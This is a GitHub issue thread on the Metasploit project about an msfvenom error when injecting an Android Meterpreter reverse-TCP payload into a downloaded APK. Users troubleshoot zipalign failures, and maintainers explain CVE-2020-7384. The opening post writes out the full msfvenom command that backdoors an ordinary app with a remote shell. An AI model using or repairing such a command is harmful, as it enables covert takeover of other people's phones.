### ISSUE TITLE
Error: No such file or directory @ rb_sysopen - /tmp/d20201017-4259-1x21kwh/aligned.apk

### ISSUE THREAD

**Issue by abdalhakkaki** [rapid7/metasploit-framework#14527]
Steps to reproduce
How'd you do it?

sudo msfvenom -x massaneger.apk -p android/meterpreter/reverse_tcp LHOST=(my ip) LPORT=5865 -o test.apk

Were you following a specific guide/tutorial or reading documentation?
If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

Expected behavior
What should happen?
Aligning /tmp/d20201017-4259-1x21kwh/test.apk
Playload size: 155131 bytes
Saved as : root/desktop/ea

Current behavior
What happens instead?
Error: No such file or directory @ rb_sysopen - /tmp/d20201017-4259-1x21kwh/aligned.apk

**Comment by shayea-ng** [comment]
hey i Have the Same problem and i dont know how to fix it !!!!

any ideas?

**Comment by abdalhakkaki** [comment]
I am at a loss, I could not find a solution to this problem

**Comment by shayea-ng** [comment]
so what should we do now? Sent from my Huawei Mobile-------- Original Message --------Subject: Re: [rapid7/metasploit-framework] Error: No such file or directory @ rb_sysopen - /tmp/d20201017-4259-1x21kwh/aligned.apk (#14527)From: abdalhakkaki To: rapid7/metasploit-framework CC: shayea-ng ,Comment 
I am at a loss, I could not find a solution to this problem

**Comment by joegreco1** [comment]
any solution to this F**** problem ?

**Comment by shayea-ng** [comment]
nah bro I got nothing

**Comment by h00die** [comment]
most likely this is caused by the inability to successfully unpack the provided apk in a way that can be injected and repacked.  I don't android, but I think the solution is to use a different apk.

**Comment by shayea-ng** [comment]
I've used so many apk's from different websites and still the same issue

**Comment by h00die** [comment]
It may be helpful to provide a list of APKs and their sources.  This could help others not run in to the same issue, as well as help someone who can attempt to fix the problem re-create it

**Comment by shayea-ng** [comment]
I downloaded apk's from apkhere.com and apkpure.com

**Comment by www-h4k3r-com** [comment]
I'm also facing same problem, i was injecting payload from msfvenom but the error occured  !!
help me with solution .

OS - parrot os
msf Version - 6 point something

**Comment by ckmanees** [comment]
Hi, Most probably the issue is the zipalign failed to align the apk successfully. you can verify it by manually trying to align the output.apk inside the temporary folder using zipalign. And I have fixed my problem with the help of stackoverflow: https://stackoverflow.com/a/65490604. There a major chance that your problem is the same too. thanks.

**Comment by www-h4k3r-com** [comment]
@ckmanees Thanks for help I'll try with that , when first time I was embedding payload to apk , that time it asked me to manually install zipalign and Apktool , can u sharelink to zipalign Download (if possible steps )

**Comment by bonu123** [comment]
Error: No such file or directory @ rb_sysopen - /tmp/d20201017-4259-1x21kwh/aligned.apk #14527

**Comment by bonu123** [comment]
Error: No such file or directory @ rb_sysopen - /tmp/d20201017-4259-1x21kwh/aligned.apk #14527

**Comment by bonu123** [comment]
A

**Comment by vokica** [comment]
Guys i think the problem is in apks in 2020 there was a vuln in metasploit and when u tried to embed apks hacker gets shell on you the only indication you are hacked is this problem that u are discusting rightnow ( error: no such file ....) so in conclusion apks are malicious. AND CHECK YOUR METASPLOIT VERSION IF ITS 6.0.11 OR LOWER U WERE HACKED. everyone who has lates version dont worry vuln was patched.

**Comment by bwatters-r7** [comment]
> Guys i think the problem is in apks in 2020 there was a vuln in metasploit and when u tried to embed apks hacker gets shell on you the only indication you are hacked is this problem that u are discusting rightnow ( error: no such file ....) so in conclusion apks are malicious. AND CHECK YOUR METASPLOIT VERSION IF ITS 6.0.11 OR LOWER U WERE HACKED. everyone who has lates version dont worry vuln was patched.

Hey..... just want to clarify some things here.  The above comment was talking about CVE-2020-7384.  Basically, the vulnerability was because we were not parameterizing some arguments properly to popen3.  This resulted in the ability of a specially-crafted apk template to execute code locally during the creation process.
Unless you built the apk from a template that was specially crafted to attack  you while you were using it as a template on a version prior to 6.0.11 (Oct 2020-ish), you are fine.
This vulnerability is not the only thing that can give the error message listed above.

If you'd like to read more about this vulnerability, check out the write up by the person who found it here:
https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md
Also, see the PR that patched it here: 
https://github.com/rapid7/metasploit-framework/pull/14288
We are super happy to have community members catching mistakes and reporting them to us so that we can fix them as quickly as possible, and we try to be as transparent as possible with the vulnerabilities found in Metasploit.

**Comment by bcoles** [comment]
>i think the problem is in apks
> [...]
> ( error: no such file ....)

The "No such file ..." error occurs when decompiling or rebuiling an APK fails. There are many reasons why this may occur. See https://github.com/rapid7/metasploit-framework/issues/13099#issuecomment-1059918908 for more information.
